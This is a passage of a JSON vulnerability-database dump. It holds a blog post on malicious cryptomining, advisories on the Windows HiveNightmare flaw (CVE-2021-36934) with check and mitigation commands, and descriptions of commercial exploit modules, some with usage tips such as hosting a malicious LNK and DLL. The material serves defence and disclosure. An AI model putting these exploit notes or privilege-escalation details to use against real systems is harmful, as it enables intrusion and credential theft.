Existing malware families like Trickbot, distributed via malicious spam attachments, temporarily added in a [coin miner module](<https://twitter.com/VK_Intel/status/959194022735523841>).\n\nInterestingly, the Trickbot authors had already expanded their banking Trojan to [steal credentials from Coinbase users](<https://blogs.forcepoint.com/security-labs/trickbot-goes-after-cryptocurrency>) as they logged into their electronic wallet. The modular nature of their malware is certainly making it easier for them to experiment with new schemes to make money.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Spam-1.png> \"\" )\n\n_Figure 2: Document containing macro that downloads the TrickBot malware_\n\nSeveral exploit kits, and [RIG EK](<https://blog.malwarebytes.com/threat-analysis/2018/01/rig-exploit-kit-campaign-gets-deep-into-crypto-craze/>) in particular have been distributing miners, usually via the intermediary of the SmokeLoader malware. In fact, cryptominers are one of the most commonly served payloads in drive-by download attacks.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/RIG_miner-1.png> \"\" )\n\n_Figure 3: An iframe redirection to RIG EK followed by a noticeable coin miner infection_\n\n### Mobile and Mac cryptominers\n\nMobile users are not immune to cryptomining either, as [Trojanized apps laced with mining code](<https://blog.malwarebytes.com/cybercrime/2018/02/bogus-hack-apps-hack-users-back-for-cryptocash/>) are also commonplace, especially for the Android platform. 
Similarly to Windows malware, malicious APKs tend to have modules for specific functionalities, such as SMS spam and of course miners.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Android-1.jpg> \"\" )\n\n_Figure 4: Source code for the mining component within an Android APK_\n\nLegitimate mining pools such as [Minergate](<https://en.bitcoin.it/wiki/MinerGate>) are often used by those Android miners, and the same is true for [Mac cryptominers](<https://blog.malwarebytes.com/threat-analysis/2018/02/new-information-unfolds-regarding-mac-cryptominer/>). The usual advice on sticking to official websites to download applications applies but is not always enough, especially when [trusted applications get hacked](<https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/>).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Mac-1.png> \"\" )\n \n \n ~/Library/Apple/Dock -user sarahmayergo1990@gmail.com@gmail.com -xmr\n\n_Figure 5: Malicious Mac application launching a Monero miner_\n\n### Drive-by cryptomining\n\nIn mid-September 2017, a mysterious entity called Coinhive launched a new service that was about to create chaos on the web, as it introduced an API to mine the Monero currency directly within the browser.\n\nWhile in-browser miners have taken off because of Coinhive's popularity, they had already been tested a few years ago, mostly as proof-of-concepts that did not develop much further. There is, however, the legal precedent of a [group of students at MIT](<https://venturebeat.com/2014/02/12/new-jersey-slaps-mit-bitcoin-hackers-with-subpoena-and-theyre-fighting-back/>) who got sued by the state of New Jersey for their coin mining attempt\u2014called Tidbit\u2014proposed as an alternative to traditional display advertising.\n\n#### **No opt-in by default**\n\nWithin weeks, the Coinhive API, void of any safeguards, was abused in drive-by cryptomining attacks. 
Similar to drive-by downloads, [drive-by mining](<https://blog.malwarebytes.com/cybercrime/2017/11/a-look-into-the-global-drive-by-cryptocurrency-mining-phenomenon/>) is an automated, silent, and platform agnostic technique that forces visitors to a website to mine for cryptocurrency.\n\nWe witnessed an interesting [campaign](<https://blog.malwarebytes.com/threat-analysis/2018/02/drive-by-cryptomining-campaign-attracts-millions-of-android-users/>) that was specifically designed for Android and drew millions of users to pages that immediately started to mine for Monero under the pretense of recouping server costs. Even though mobile devices aren't as powerful as desktops, let alone servers, this event showed that no one is immune to drive-by mining.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Android_Drive_by-mining-1-1.png> \"\" )\n\n_Figure 6: An in-browser miner for Chrome on Android _\n\n[Malvertising](<https://blog.malwarebytes.com/threat-analysis/2017/09/drive-by-mining-and-ads-the-wild-wild-west/>) was once again a major factor in spreading coin miners to a large audience, as we saw with the [YouTube case](<https://twitter.com/Mystic_Ervo/status/956237422391709696>) that involved malicious ads via DoubleClick. Another interesting vector, which security people have warned about for years, is the use of third-party scripts that have become ubiquitous. A company called Texthelp had one of their [plugins compromised](<https://www.troyhunt.com/the-javascript-supply-chain-paradox-sri-csp-and-trust-in-third-party-libraries/>) and injected with a Coinhive script, leading to hundreds of government websites in the UK unwillingly participating in malicious cryptomining activity.\n\nTo fend off criticism, Coinhive introduced a new API (AuthedMine) that explicitly requires user input for any mining activity to be allowed. 
The idea was that considerate website owners would use this more \u201cethical\u201d API instead, so that their visitors can knowingly opt-in or out before engaging in cryptomining. This was also an argument that Coinhive put forward to defend its stance against ad blockers and antivirus products.\n\nWhile only Coinhive themselves would have accurate statistics, according to our own telemetry the opt-in version of their API was barely used (40K/day) in comparison to the silent one (3M/day), as pictured in the below histograms during the period of January 10 to February 6.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Coinhive_opt-in-1.png> \"\" )\n\n_Figure 7: Usage statistics for the opt-in version of Coinhive_\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/Coinhive_silent_drive-by-1.png> \"\" )\n\n_Figure 8: Usage statistics for the silent version of Coinhive_\n\nMoreover, even websites that do use the opt-in option may still be crippling machines by running an unthrottled miner, as was the case with popular[ American news website Salon](<https://twitter.com/jonathansampson/status/963465011153833984>)[[.]com](<https://twitter.com/jonathansampson/status/963465011153833984>).\n\n#### **Copycats**\n\nSeveral copycats emerged in the wake of Coinhive's immediate success. According to our stats, _coin-have[.]com_ is the second most popular service, followed by _crypto-loot[.]com_. 
While Coinhive takes a 30 percent commission on all mining earnings, Coin Have advertises the lowest commission rates in the market at 20 percent, although CryptoLoot itself claims to pay out 88 percent of mined commissions.\n\nIn addition to bigger payouts, other \u201cattractive\u201d features pushed by newcomers are low payment thresholds and the ability to bypass ad blockers, which they often view as their number one threat.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/copycats-1.png> \"\" )\n\n_Figure 9: Two of the most popular Coinhive copycats_\n\n#### **Browsers and technologies abused**\n\nContrary to malware-based coin miners, drive-by cryptomining does not require infecting a machine. This is both a strength and weakness in the sense that it can potentially reach a much wider audience but is also more ephemeral in nature.\n\nFor example, if a user navigates away from the website they are on or closes the offending tab, that will cause the mining activity to stop, which is a major drawback. However, we observed that some miners have developed sneaky ways of making drive-by mining [persistent](<https://blog.malwarebytes.com/cybercrime/2017/11/persistent-drive-by-cryptomining-coming-to-a-browser-near-you/>), thanks to the use of pop-unders, a practice well-known in the ad fraud business. To add insult to injury, the malicious pop-under tab containing the mining code would get placed right underneath the taskbar, rendering it virtually invisible to the end user. Thanks to this trick, the mining can carry on until the user actually restarts their computer.\n\nAnother way to mine for long and uninterrupted periods of time is by using a booby-trapped browser extension that will inject code in each web session. 
This is what happened to the Archive Poster extension because one of their developers had his Google account credentials compromised.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/extension-1.png> \"\" )\n\n_Figure 10: The compromised extension with a rogue JavaScript for Coinhive_\n\nIt is worth noting that JavaScript is not the only way to mine for coins within the browser. Indeed, we have observed WebAssembly, a newer format available in modern browsers, being used more and more. WebAssembly modules have the advantage of running at near native speed, making them a lot faster and more efficient than JavaScript.\n \n \n | payload =\n \u00a0 - [ ExportSection\n \u00a0\u00a0\u00a0 | count = 27\n \u00a0\u00a0\u00a0 | entries =\n \u00a0\u00a0\u00a0 - [ ExportEntry\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_len = 9\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_str = \"stackSave\"\n \u00a0\u00a0\u00a0\u00a0\u00a0 | kind = 0x0\n \u00a0\u00a0\u00a0\u00a0\u00a0 | index = 71\n \u00a0\u00a0\u00a0 - [ ExportEntry\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_len = 17\n \u00a0\u00a0\u00a0\u00a0\u00a0 | field_str = \"_cryptonight_hash\"\n \u00a0\u00a0\u00a0\u00a0\u00a0 | kind = 0x0\n \u00a0\u00a0\u00a0\u00a0\u00a0 | index = 70\n\n_Figure 11: Code snippet from a WebAssembly module designed for mining Monero_\n\nWhile drive-by mining typically happens via the standard HTTP protocol\u2014either via HTTP or HTTPS connections\u2014we have witnessed more and more examples of miners communicating via WebSockets instead.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/02/websocket_-1.png> \"\" )\n\n_Figure 12: A Web Socket connection to Coinhive_\n\nA WebSocket is another communication protocol that allows streams of data to be exchanged. There is an initial handshake request and response with a remote server followed by the actual data streams. 
Coin mining code wrapped within a secure (wss) WebSocket is more difficult to identify and block.\n\n### Conclusion\n\nAs the threat landscape continues to evolve, its connections to real-world trends become more and more obvious. Malware authors are not only enjoying the relative anonymity provided by digital currencies but also want to amass them.\n\nCryptomining malware provides a good use case for leveraging the size and power of a botnet in order to perform CPU-intensive mining tasks without having to bear the costs incurred in the process. In some aspect, drive-by mining also applies the same concept, except that the botnet of web users it creates is mostly temporary.\n\nWhile malicious cryptomining appears to be far less dangerous to the user than ransomware, its effects should not be undermined. Indeed, unmanaged miners could seriously disrupt business or infrastructure critical processes by overloading systems to the point where they become unresponsive and shut down. Under the disguise of a financially-motivated attack, this could be the perfect alibi for advanced threat actors.\n\nMalwarebytes users, regardless of their platform, are protected against unwanted cryptomining, whether it is done via malware or the web.\n\nThe post [The state of malicious cryptomining](<https://blog.malwarebytes.com/cybercrime/2018/02/state-malicious-cryptomining/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-02-26T16:08:03", "type": "malwarebytes", "title": "The state of malicious cryptomining", 
"bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2018-02-26T16:08:03", "href": "https://blog.malwarebytes.com/cybercrime/2018/02/state-malicious-cryptomining/", "id": "MALWAREBYTES:B49179B9854ECB9B3B25403D4C9D0804", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "cert": [{"lastseen": "2023-05-23T17:12:01", "description": "### Overview\n\nMultiple versions of Windows 10 grant non-administrative users read access to files in the `%windir%\\system32\\config` directory. 
This can allow for local privilege escalation (LPE).\n\n### Description\n\nWith multiple versions of Windows 10, the `BUILTIN\\Users` group is given `RX` permissions to files in the `%windir%\\system32\\config` directory.\n\nIf a VSS shadow copy of the system drive is available, a non-privileged user may leverage access to these files to achieve a number of impacts, including but not limited to:\n\n * Extract and leverage account password hashes.\n * Discover the original Windows installation password.\n * Obtain DPAPI computer keys, which can be used to decrypt all computer private keys.\n * Obtain a computer machine account, which can be used in a [silver ticket attack](<https://www.sans.org/blog/kerberos-in-the-crosshairs-golden-tickets-silver-tickets-mitm-and-more/>).\n\nNote that VSS shadow copies may not be available in some configurations; however, simply having a system drive that is larger than 128GB in size and then performing a Windows Update or installing an MSI will ensure that a VSS shadow copy will be [automatically created](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/system-restore-points-disabled#more-information>). 
To check if a system has VSS shadow copies available, run the following command from a privileged command prompt:\n\n`vssadmin list shadows`\n\nA system with VSS shadow copies will report details of at least one shadow copy that specifies `Original Volume: (C:)`, such as the following:\n \n \n vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool\n (C) Copyright 2001-2013 Microsoft Corp.\n \n Contents of shadow copy set ID: {d9e0503a-bafa-4255-bfc5-b781cb27737e}\n Contained 1 shadow copies at creation time: 7/19/2021 10:29:49 PM\n Shadow Copy ID: {b7f4115b-4242-4e13-84c0-869524965718}\n Original Volume: (C:)\\\\?\\Volume{4c1bc45e-359f-4517-88e4-e985330f72e9}\\\n Shadow Copy Volume: \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\n Originating Machine: DESKTOP-PAPIHMA\n Service Machine: DESKTOP-PAPIHMA\n Provider: 'Microsoft Software Shadow Copy provider 1.0'\n Type: ClientAccessibleWriters\n Attributes: Persistent, Client-accessible, No auto release, Differential, Auto recovered\n \n\nA system **without** VSS shadow copies will produce output like the following:\n \n \n vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool\n (C) Copyright 2001-2013 Microsoft Corp.\n \n No items found that satisfy the query.\n \n\nTo check if a system is vulnerable, the following command can be used from a non-privileged command prompt: `icacls %windir%\\system32\\config\\sam`\n\nA vulnerable system will report `BUILTIN\\Users:(I)(RX)` in the output like this:\n \n \n C:\\Windows\\system32\\config\\sam BUILTIN\\Administrators:(I)(F)\n NT AUTHORITY\\SYSTEM:(I)(F)\n BUILTIN\\Users:(I)(RX)\n APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\n APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\n \n Successfully processed 1 files; Failed processing 0 files\n \n\nA system that is not vulnerable will report output like this:\n \n \n C:\\Windows\\system32\\config\\sam: Access is denied.\n Successfully 
processed 0 files; Failed processing 1 files\n \n\nThis vulnerability has been publicly referred to as both HiveNightmare and SeriousSAM, while Microsoft has assigned CVE-2021-36934 to the vulnerability.\n\n### Impact\n\nBy accessing files in the Windows `%windir%\\system32\\config` directory on a vulnerable system with at least one VSS shadow copy of the system drive, a local authenticated attacker may be able to achieve LPE, masquerade as other users, or achieve other security-related impacts.\n\n### Solution\n\nPlease see the [Microsoft bulletin for CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>), which contains a workaround. Specifically:\n\n#### Restrict access to %windir%\\system32\\config and remove VSS shadow copies\n\nVulnerable systems can enable ACL inheritance for files in the `%windir%\\system32\\config` directory by running the following command from an elevated prompt:\n \n \n icacls %windir%\\system32\\config\\*.* /inheritance:e\n \n\nOnce the ACLs have been corrected for these files, any VSS shadow copies of the system drive must be deleted to protect a system against exploitation. This can be accomplished with the following command:\n \n \n vssadmin delete shadows /for=%systemdrive% /Quiet\n \n\nConfirm that VSS shadow copies were deleted by running `vssadmin list shadows` again. Note that any capabilities relying on existing shadow copies, such as System Restore, will not function as expected. Newly-created shadow copies, which will contain the proper ACLs, will function as expected. 
Please see [KB5005357](<https://support.microsoft.com/en-us/topic/kb5005357-delete-volume-shadow-copies-1ceaa637-aaa3-4b58-a48b-baf72a2fa9e7>) for more details.\n\n### Acknowledgements\n\nThis vulnerability was publicly disclosed by Jonas Lyk, with additional details provided by Benjamin Delpy.\n\nThis document was written by Will Dormann.\n\n### Vendor Information\n\n### Microsoft: Affected\n\nNotified: 2021-07-20 Updated: 2021-07-20 **CVE-2021-36934**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>\n\n### References\n\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>\n * <https://support.microsoft.com/en-us/topic/kb5005357-delete-volume-shadow-copies-1ceaa637-aaa3-4b58-a48b-baf72a2fa9e7>\n * <https://twitter.com/jonasLyk/status/1417205166172950531>\n * <https://twitter.com/gentilkiwi/status/1417467063883476992>\n * <https://www.sans.org/blog/kerberos-in-the-crosshairs-golden-tickets-silver-tickets-mitm-and-more/>\n * <https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/system-restore-points-disabled#more-information>\n * <https://doublepulsar.com/hivenightmare-aka-serioussam-anybody-can-read-the-registry-in-windows-10-7a871c465fa5>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2021-36934 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2021-36934>) \n---|--- \n**Date Public:** | 2021-07-20 \n**Date First Published:** | 2021-07-20 \n**Date Last Updated: ** | 2021-07-29 16:29 UTC \n**Document Revision: ** | 11 \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", 
"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-20T00:00:00", "type": "cert", "title": "Microsoft Windows 10 gives unprivileged user access to system32\\config files", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-29T16:29:00", "id": "VU:506989", "href": "https://www.kb.cert.org/vuls/id/506989", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "veeam": [{"lastseen": "2023-02-14T15:24:44", "description": "This article documents Veeam's position on Windows Elevation of Privilege Vulnerability CVE-2021-36934. 
Specifically regarding the listed mitigation steps involving removal of all shadow copies, and the \"Impact of workaround\" mentioned in the Workarounds section of CVE-2021-36934.", "cvss3": {}, "published": "2021-11-01T00:00:00", "type": "veeam", "title": "Veeam Best Practices regarding CVE-2021-36934", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-36934"], "modified": "2021-11-01T00:00:00", "id": "VEEAM:KB4231", "href": "https://www.veeam.com/kb4231", "cvss": {"score": 0.0, "vector": "NONE"}}], "rapid7blog": [{"lastseen": "2021-07-31T08:56:21", "description": "\n\nOn Monday, July 19, 2021, community security researchers began [reporting](<https://twitter.com/jonasLyk/status/1417205166172950531>) that the Security Account Manager (SAM) file on Windows 10 and 11 systems was READ-enabled for all local users. The SAM file is used to store sensitive security information, such as hashed user and admin passwords. READ enablement means attackers with a foothold on the system can use this security-related information to escalate privileges or access other data in the target environment.\n\nOn Tuesday, July 20, Microsoft issued an out-of-band advisory for this vulnerability, which is now tracked as [CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>). As of July 22, 2021, the vulnerability has been confirmed to affect Windows 10 version 1809 and later. A public proof-of-concept is available that allows non-admin users to retrieve all registry hives. Researcher Kevin Beaumont has also [released a demo](<https://doublepulsar.com/hivenightmare-aka-serioussam-anybody-can-read-the-registry-in-windows-10-7a871c465fa5>) that confirms CVE-2021-36934 can be used to obtain local hashes and pass them to a remote machine, achieving remote code execution as SYSTEM on arbitrary targets (in addition to privilege escalation). 
The security community has christened this vulnerability \u201cHiveNightmare\u201d and \u201cSeriousSAM.\u201d\n\nCERT/CC [published in-depth vulnerability notes](<https://www.kb.cert.org/vuls/id/506989>) on CVE-2021-36934, which we highly recommend reading. Their analysis reveals that starting with Windows 10 build 1809, the BUILTIN\\Users group is given RX permissions to files in the `%windir%\\system32\\config` directory. If a VSS shadow copy of the system drive is available, a non-privileged user may leverage access to these files to:\n\n * Extract and leverage account password hashes.\n * Discover the original Windows installation password.\n * Obtain DPAPI computer keys, which can be used to decrypt all computer private keys.\n * Obtain a computer machine account, which can be used in a [silver ticket attack](<https://www.sans.org/blog/kerberos-in-the-crosshairs-golden-tickets-silver-tickets-mitm-and-more/>).\n\n**There is no patch for CVE-2021-36934 as of July 21, 2021.** Microsoft has released workarounds for Windows 10 and 11 customers that mitigate the risk of immediate exploitation\u2014we have reproduced these workarounds in the `Mitigation Guidance` section below. Please note that Windows customers must **BOTH** restrict access and delete shadow copies to prevent exploitation of CVE-2021-36934. We recommend applying the workarounds on an emergency basis.\n\n## Mitigation Guidance\n\n**1\\. Restrict access to the contents of `%windir%\\system32\\config`:**\n\n * Open Command Prompt or Windows PowerShell as an administrator.\n * Run this command:\n \n \n icacls %windir%\\system32\\config\\*.* /inheritance:e\n \n\n**2\\. 
Delete Volume Shadow Copy Service (VSS) shadow copies:**\n\n * Delete any System Restore points and Shadow volumes that existed prior to restricting access to `%windir%\\system32\\config`.\n * Create a new System Restore point if desired.\n\n**Windows 10 and 11 users must apply both workarounds to mitigate the risk of exploitation.** Microsoft has noted that deleting shadow copies may impact restore operations, including the ability to restore data with third-party backup applications.\n\nThis story is developing quickly. We will update this blog with new information as it becomes available.\n\n## Updates\n\n**July 27, 2021:** Microsoft has **removed Windows Server 2019 and Windows Server 20H2** from the list of versions affected by CVE-2021-36934.\n\n**July 22, 2021:** Microsoft added Windows Server 2019 and Windows Server 20H2 to the [list of affected versions](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>).\n\n## Resources\n\n * [Microsoft advisory for CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>)\n * [CERT/CC vulnerability notes](<https://www.kb.cert.org/vuls/id/506989>)\n * [Public PoC for CVE-2021-36934](<https://github.com/GossiTheDog/HiveNightmare>)\n * [Additional demo and analysis of CVE-2021-36934](<https://doublepulsar.com/hivenightmare-aka-serioussam-anybody-can-read-the-registry-in-windows-10-7a871c465fa5>)", "cvss3": {}, "published": "2021-07-21T16:01:19", "type": "rapid7blog", "title": "Microsoft SAM File Readability CVE-2021-36934: What You Need to Know", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-21T16:01:19", "id": "RAPID7BLOG:21FF66FD08C23AC39BCCB8CFE2238507", "href": "https://blog.rapid7.com/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "canvas": [{"lastseen": "2021-07-28T14:33:28", "description": "**Name**| osx_parsekeymapping 
\n---|--- \n**CVE**| CVE-2014-4404 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| IOHIKeyboardMapper::parseKeyMapping local privilege escalation \n**Notes**| CVE Name: CVE-2014-4404 \nVENDOR: Apple \nNotes: \n \nTested on: \n\\- 10.9 \n\\- 10.9.1 \n\\- 10.9.2 \n\\- 10.9.3 \n\\- 10.9.4 \n\\- 10.9.5 \n \n \nRepeatability: Multiple Times \nReferences: https://code.google.com/p/google-security-research/issues/detail?id=40 \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4404 \n\n", "cvss3": {}, "published": "2014-09-18T10:55:00", "type": "canvas", "title": "Immunity Canvas: OSX_PARSEKEYMAPPING", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4404"], "modified": "2014-09-18T10:55:00", "id": "OSX_PARSEKEYMAPPING", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/osx_parsekeymapping", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:19", "description": "**Name**| special_lnk \n---|--- \n**CVE**| CVE-2017-8464 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| special_lnk \n**Notes**| References: ['https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464', 'http://paper.seebug.org/357/', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'] \nCVE Name: CVE-2017-8464 \nVENDOR: Microsoft \nNOTES: \n**DIALOG BOX** \nIn the dialog box, 
both remote and local paths can be specified in such a way \nthat the LNK and DLL-based callback can be hosted by Canvas. To make Canvas \nput the correct IP in for your own system, start the SMB path with \\HOSTLOCAL. \nOther names than HOSTLOCAL can be entered as well, but HOSTLOCAL will be replaced \nwith the IP that your callback is listening on. \n \nShould you want to create the LNK and DLL for distribution via other means, using \ndisk-paths such as C:\\users\\target\\callback.dll will work. \n \n**NOTE** : To reiterate: an LNK path starting with \\HOSTLOCAL will tell the \nmodule to host the LNK itself. If you do not want this to happen, simply specify \nan on-disk path. \n \nTested on: \n\\- Windows 10 (64 bit) with (local + remote) DLL path \n\\- Windows 8 (32 bit) with local DLL path \n\\- Windows 7 (32 bit) with (local + remote) DLL path \n \n**HIGHLY IMPORTANT NOTE** \nIn our testing, we have discovered that this exploit is not just a clientside. \nOn multiple Windows 10 x64 systems we have noticed that in certain repeatable \ncircumstances, SearchProtocolHost.exe, a SYSTEM-privileged process, will \nrender the LNK. This behavior has not been observed on Windows 7 or Windows 8. \n \n**In order to use this exploit as an LPE, just rename the original LNK after \nyou have a shell** \n \nWe have observed in our labs that using a UNC path that maps to a WebDAV share \nis incredibly slow regardless of the software behind the share. For this reason \nwe recommend the use of an SMB share for remote/clientside exploitation where \ndelivery of only the LNK is possible. \n \nSpecial thanks to Haifei Li and VXJump for their analysis. 
\n \nDate public: 06/27/2017 \nCVE Url: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8464 \nCVSS: 7.5 \n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-15T01:29:00", "type": "canvas", "title": "Immunity Canvas: SPECIAL_LNK", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8464"], "modified": "2017-06-15T01:29:00", "id": "SPECIAL_LNK", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/special_lnk", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:29", "description": "**Name**| rootpipe \n---|--- \n**CVE**| CVE-2015-1130 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| OS X XPC Admin Framework (rootpipe) local privilege escalation \n**Notes**| CVE Name: CVE-2015-1130 \nVENDOR: Apple \nNotes: \n \nThis is a local privilege escalation affecting all Mac OS X versions from 10.7 \nup to 10.10.2. We provide both a 32bit and 64bit version of the exploit. 
\n \nTested on: \n\\- 10.10.1 \n\\- 10.9.5 \n\\- 10.9.4 \n\\- 10.9.3 \n\\- 10.9.2 \n\\- 10.9.1 \n\\- 10.9 \n\\- 10.7.2 \n \nRepeatability: Multiple Times \nReferences: https://truesecdev.wordpress.com/2015/04/09/hidden-backdoor-api-to-root-privileges-in-apple-os-x/ \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1130 \n\n", "cvss3": {}, "published": "2015-04-10T14:59:00", "type": "canvas", "title": "Immunity Canvas: ROOTPIPE", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1130"], "modified": "2015-04-10T14:59:00", "id": "ROOTPIPE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/rootpipe", "sourceData": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2023-01-02T12:21:13", "description": "A heap overflow in IOHIKeyboardMapper::parseKeyMapping allows kernel memory corruption in Mac OS X before 10.10. 